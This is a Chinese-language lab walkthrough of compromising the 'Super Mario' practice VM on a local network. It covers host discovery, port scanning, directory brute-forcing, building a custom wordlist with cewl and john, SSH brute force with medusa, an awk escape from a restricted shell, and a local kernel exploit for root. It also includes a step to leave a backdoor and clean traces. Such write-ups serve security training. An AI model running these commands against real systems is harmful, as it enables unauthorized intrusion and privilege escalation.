目錄
1. 查看Kali的IP信息;(IP:192.168.37.131)
一. 實驗環境
- 靶機:超級瑪麗,IP地址暫時未知;
- 測試機:Kali,IP地址:192.168.37.131;
- 測試機:物理機win7;
二. 實驗流程
- 信息收集——主機發現
- 信息收集——端口掃描
- 滲透測試
三. 實驗步驟
(一)信息收集——主機發現
1. 查看Kali的IP信息;(IP:192.168.37.131)
2. 查看靶機頁面;
3. 掃描主機(netdiscover)
netdiscover -i eth0 -r 192.168.37.0/24
Netdiscover: -i 指定網卡 -r 指定網段
(二)信息收集——端口掃描
1. 掃描端口(masscan)
masscan --rate=10000 --ports 0-65535 192.168.37.148
掃描發現目標開放了22,8180端口;
2. 詳細掃描端口信息(nmap)
nmap -T4 -sV -O -p 22,8180 192.168.37.148
22(ssh),8180(http);
(三)滲透測試
8180端口(http服務)
1. 訪問目標靶機的80端口
http://192.168.37.148:8180
2. 網站目錄掃描(dirb)
dirb http://192.168.37.148:8180
嘗試拿大字典掃描
3. 查看掃描到的網站目錄
3.1> http://192.168.37.148:8180/index.html
3.2> http://192.168.37.148:8180/vhosts
ServerName mario.supermariohost.local
4. 修改物理主機的hosts文件;
- Windows中hosts文件:C:\Windows\System32\drivers\etc\hosts
- Linux中hosts文件:/etc/hosts
- Hosts文件作用:將一些常用的網址域名與其對應的IP地址建立一個關聯“數據庫”,當用戶在瀏覽器中輸入一個需要登錄的網址時,系統會首先自動從hosts文件中去尋找對應的IP地址,一旦找到,系統會立即打開對應網頁,如果沒有找到,系統則會再將網址提交DNS域名解析服務器進行IP地址解析
5. 使用目錄爆破工具繼續查看;
5.1> http://mario.supermariohost.local:8180/luigi.php
可以針對出現的內容生成自定義的字典;
5.2> http://mario.supermariohost.local:8180/mario.php
6. 生成針對的字典並爆破;
6.1> 在Kali中,將主機和對應域名寫入hosts文件;
6.2> 使用命令生成自定義字典;
cewl http://mario.supermariohost.local:8180/luigi.php -d -w /root/dict.txt
6.3> 針對生成的字典做篩選,刪除重複和一些明顯無用的信息;
6.4> 將字典生成用戶名;
john --wordlist=/root/dict.txt --stdout --rules > user
並做一些簡單的篩選;
6.5> 將字典生成密碼;
john --wordlist=/root/dict.txt --stdout --rules > passwd
6.6> 使用medusa進行ssh爆破;(也可以使用其他工具)
medusa -M ssh -h 192.168.37.148 -U user -P passwd
成功獲取用戶名和密碼;用戶名:luigi,密碼:luigi1
6.7> 嘗試ssh遠程連接;
成功獲取shell,但是限制shell交互;
7. 提權
7.1> help命令查看靶機支持的命令;
能使用awk命令,awk調用shell命令有兩種方法,system與print;
7.2> 使用AWK命令調用shell命令;
awk 'BEGIN{system("/bin/bash")}'
成功獲取了交互式的shell;接下來就需要提權;
7.3> 查看版本的信息;
7.4> 使用Kali搜索版本的漏洞;
searchsploit 3.13.
7.5> 將exp下載到靶機上;
7.6> 編譯並執行;
成功獲取root權限;
8. 留後門,清痕跡;
四. 實驗總結
- 網站目錄中的信息要格外關注,是滲透進網站的突破口;
- 針對網頁中出現用戶名的信息,可以做成一個針對性的字典去爆破;
- Help命令可以查看主機支持的命令;根據支持的命令就有可能獲取shell;